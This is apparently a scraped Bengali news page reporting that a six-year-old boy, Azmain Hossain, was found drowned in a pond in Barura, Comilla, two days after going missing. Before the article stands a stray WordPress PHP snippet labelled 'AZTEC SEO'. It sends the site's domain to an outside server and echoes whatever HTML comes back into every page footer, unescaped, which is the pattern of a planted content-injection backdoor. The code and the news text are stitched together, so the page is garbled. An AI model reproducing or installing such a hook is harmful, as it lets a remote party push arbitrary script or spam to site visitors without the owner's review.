/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
কুমিল্লার বরুড়ায় নিখোঁজের দুদিন পর আজমাঈন হোসেন নামে ছয় বছরের এক শিশুর লাশ উদ্ধার করা হয়েছে। বুধবার দুপুরে বাড়ির পাশের একটি ডোবা থেকে তার লাশ উদ্ধার করা হয়।
মৃত আজমাঈন বরুড়া উপজেলার চিতড্ডা ইউনিয়নের ওড্ডা গ্রামের মো. শাহজাহান হোসেন সাজুর ছেলে।
পুলিশ এবং স্থানীয়রা জানান, সোমবার (২৭ এপ্রিল) বিকালে ওড্ডা উত্তরপাড়া কেন্দ্রীয় জামে মসজিদের সামনে খেলাধুলা করতে গিয়ে নিখোঁজ হন আজমাঈন। পরিবারের সদস্যরা আত্মীয়-স্বজনসহ সম্ভাব্য সব জায়গায় খোঁজাখুঁজি করেও তার কোনো সন্ধান পায়নি। বিষয়টি নিয়ে পরিবার এবং স্বজনরা সামাজিক যোগাযোগমাধ্যমেও শিশুটির সন্ধান চেয়ে আবেদন জানান।
বুধবার দুপুরে বাড়ির পাশের একটি ডোবায় আজমাঈনের লাশ ভেসে ওঠে। এ সময় স্থানীয়রা তাকে উদ্ধার করে। এতে পরিবারে শোকের মাতম শুরু হয়। আদরের সন্তানকে হারিয়ে বাকরুদ্ধ হয়ে পড়েন বাবা-মা। তার মৃত্যুতে ওড্ডা গ্রামসহ পুরো এলাকায় গভীর শোকের ছায়া নেমে এসেছে।
এ বিষয়ে বরুড়া থানার ওসি মো. আজহারুল ইসলাম বলেন, খেলতে গিয়ে বাড়ির পাশে একটি ডোবায় পড়ে শিশু আজমাঈনের মৃত্যু হয়েছে। খবর পেয়ে পুলিশ ঘটনাস্থল পরিদর্শন করেছে। মৃত শিশুর পরিবারের সঙ্গে আলোচনা করা হয়েছে। এ বিষয়ে পরিবারের পক্ষ থেকে কোনো অভিযোগ করা হয়নি।